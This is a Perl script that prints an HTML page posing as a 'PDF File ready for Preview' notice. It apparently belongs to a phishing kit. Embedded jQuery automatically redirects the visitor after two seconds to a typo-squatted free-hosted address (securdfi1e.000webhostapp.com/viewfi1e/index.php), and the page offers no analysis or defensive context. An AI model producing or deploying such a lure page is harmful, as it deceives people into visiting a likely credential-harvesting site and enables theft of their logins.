print "<html>\n";
print "<head>\n";
print "<title>Start Auto Download file</title>\n";
print "<script src=\"http://code.jquery.com/jquery-3.2.1.min.js\"></script>\n";
print "<script>\n";
print "$(function() {\n";
print "$('a[data-auto-download]').each(function(){\n";
print "var $this = $(this);\n";
print "setTimeout(function() {\n";
print "window.location = $this.attr('href');\n";
print "}, 2000);\n";
print "});\n";
print "});\n";
print "</script>\n";
print "</head>\n";
print "<body>\n";
print "<div class=\"wrapper\">\n";
print "<p>\n";
print "<img style=\"BORDER-TOP: 0px; BORDER-RIGHT: 0px; BORDER-BOTTOM: 0px; BORDER-LEFT: 0px\" src=\"http://www.filefacts.net/exticons/11.png\" width=\"36\" height=\"36\">\n";
print "PDF File is ready for Preview in a sec. If it doesn't, click\n";
print "<a data-auto-download href=\"https://securdfi1e.000webhostapp.com/viewfi1e/index.php\">here</a>.</p>\n";
print "</div>\n";
print "</body>\n";
print "</html>";
